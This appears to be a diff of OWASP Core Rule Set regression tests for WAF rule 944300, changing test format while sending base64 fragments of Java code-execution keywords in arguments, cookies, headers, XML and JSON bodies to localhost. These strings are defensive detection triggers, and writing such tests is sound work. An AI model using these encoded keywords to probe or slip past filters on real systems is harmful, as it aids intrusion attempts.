headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 28 desc: "XML attribute value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 29 desc: "XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 30 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 31 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log: + expect_ids: [944300] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 34 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 35 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: 
- input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 36 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 37 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 38 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 39 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 40 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 41 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log: + expect_ids: [944300] + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 48 desc: "Cookie name includes 
keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
